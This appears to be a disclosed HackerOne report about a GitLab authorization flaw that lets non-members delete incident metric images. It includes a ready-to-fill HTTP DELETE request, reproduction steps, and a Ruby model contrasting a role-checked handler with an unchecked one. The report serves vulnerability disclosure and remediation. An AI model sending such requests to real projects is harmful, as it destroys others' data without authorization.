Any gitlab user can Delete all metrics images from incidents without permissions
HackerOne report #1107281 by ashish_r_padelkar
on 2021-02-19, assigned to @ngeorge1:
Report
Summary
Hello,
It is possible to delete all metrics images from incidents of public projects as a non-member without any permissions. When you browse to any incident's metrics images, you won't see a delete option for them. However, it is possible for any guest user to delete these metric images using this vulnerability!
Prerequisites
Metrics images are only available on issues of the Incident type. You need to create an issue with the type set to Incident.
Steps to reproduce
1. Log in as a guest user and go to any public project's incident metrics image, for example https://gitlab.com/<NameSpace>/<ProjectName>/-/issues/<ID>, and click on the Metrics tab.
2. You won't see the Delete option because you don't have any permission to delete this image.
3. Just form a request like the one below.
DELETE /api/v4/projects/[REDACTED]/issues/5/metric_images/44 HTTP/1.1
Host: gitlab.com
Connection: close
Accept: application/json, text/plain, */*
X-CSRF-Token: <Replace_your_csrf_Token>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/gitlabadminuser/mvn-example/-/issues/2
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: <Replace_Your_Cookies>
You need to supply the project ID, issue ID and metrics image ID in the above request. In the above example, 23887195 is the project ID, 5 is the issue ID and 44 is the metric image ID.
4. This will delete the metric image from the issue although you don't have access to do so!
This way, you can delete all the public metrics images even if you don't have any access to the project!
What is the current bug behavior?
Non-members can delete all the public metrics images without permissions!
What is the expected correct behavior?
Only reporters (or developers) should be able to delete the metrics images within their own projects.
Output of checks
This bug happens on GitLab.com
Regards,
Ashish
Impact
Any GitLab user can potentially delete all the public metric images from incidents without permission.
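The bug class behind this report is a destroy endpoint that locates the record but never checks the caller's role on the project. The Ruby below is an added illustration, not GitLab's code: it models a minimal "delete metric image" handler with the policy check the expected behaviour calls for (at least Reporter on the project) next to the same handler with the check missing. The roles, structs, IDs and the `MetricImageApi` class are constructed for the example; the endpoint path in the comment mirrors the one in the report.

```ruby
# Added example (not GitLab's code): a minimal model of the authorization
# check a "delete metric image" API endpoint needs. Roles, structs and
# sample records are constructed for illustration.

# Access levels, ordered: a higher level includes everything below it.
ACCESS_LEVELS = { none: 0, guest: 10, reporter: 20, developer: 30, maintainer: 40 }.freeze

User        = Struct.new(:id)
Project     = Struct.new(:id, :visibility, :members)  # members: { user_id => role }
Issue       = Struct.new(:id, :project_id, :type)     # type :incident or :issue
MetricImage = Struct.new(:id, :issue_id)

class ForbiddenError < StandardError; end
class NotFoundError  < StandardError; end

# A user's role comes from project membership only. Public visibility lets a
# non-member read the project; it does not make them a member.
def role_for(user, project)
  project.members.fetch(user.id, :none)
end

# Policy: deleting a metric image requires at least the Reporter role.
def can_destroy_metric_image?(user, project)
  ACCESS_LEVELS.fetch(role_for(user, project)) >= ACCESS_LEVELS[:reporter]
end

class MetricImageApi
  def initialize(projects:, issues:, images:)
    @projects, @issues, @images = projects, issues, images
  end

  # Handler for DELETE /projects/:project_id/issues/:issue_id/metric_images/:id
  # Fixed form: authorize first, then verify the record chain, then delete.
  def destroy(user, project_id:, issue_id:, image_id:)
    project = @projects.fetch(project_id) { raise NotFoundError, 'project' }
    raise ForbiddenError, 'insufficient role' unless can_destroy_metric_image?(user, project)
    image = find_image(project_id, issue_id, image_id)
    @images.delete(image.id)
  end

  # Bug-class illustration: the same handler with the policy check missing.
  # Any signed-in user who can reach the public project can delete.
  def destroy_without_check(user, project_id:, issue_id:, image_id:)
    @projects.fetch(project_id) { raise NotFoundError, 'project' }
    image = find_image(project_id, issue_id, image_id)
    @images.delete(image.id)
  end

  def image_ids
    @images.keys
  end

  private

  # Metric images exist only on Incident issues; the image must belong to the
  # issue and the issue to the project, so IDs from another project never match.
  def find_image(project_id, issue_id, image_id)
    issue = @issues[issue_id]
    raise NotFoundError, 'issue' unless issue && issue.project_id == project_id && issue.type == :incident
    image = @images[image_id]
    raise NotFoundError, 'image' unless image && image.issue_id == issue_id
    image
  end
end

# Constructed sample data: one public project whose only member (user 2) is a
# Reporter, one incident with two metric images; user 1 is a non-member.
def build_api
  project = Project.new(100, :public, { 2 => :reporter })
  MetricImageApi.new(
    projects: { 100 => project },
    issues:   { 5 => Issue.new(5, 100, :incident) },
    images:   { 44 => MetricImage.new(44, 5), 45 => MetricImage.new(45, 5) }
  )
end

NON_MEMBER = User.new(1)
REPORTER   = User.new(2)

# Runs one delete attempt and reports :deleted or :forbidden.
def attempt(api, user, image_id, checked: true)
  if checked
    api.destroy(user, project_id: 100, issue_id: 5, image_id: image_id)
  else
    api.destroy_without_check(user, project_id: 100, issue_id: 5, image_id: image_id)
  end
  :deleted
rescue ForbiddenError
  :forbidden
end

if __FILE__ == $PROGRAM_NAME
  api = build_api
  puts "non-member, checked handler:   #{attempt(api, NON_MEMBER, 44)}"
  puts "reporter, checked handler:     #{attempt(api, REPORTER, 44)}"
  puts "non-member, unchecked handler: #{attempt(api, NON_MEMBER, 45, checked: false)}"
end
```

The order inside `destroy` matters: the role check runs before any record lookup, so a non-member gets the same response whether or not the image exists, and the issue-to-project and image-to-issue checks stop an ID from one project being used against another. The unchecked variant is kept only to make the difference visible in a test.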
How To Reproduce
Please add reproducibility information to this section: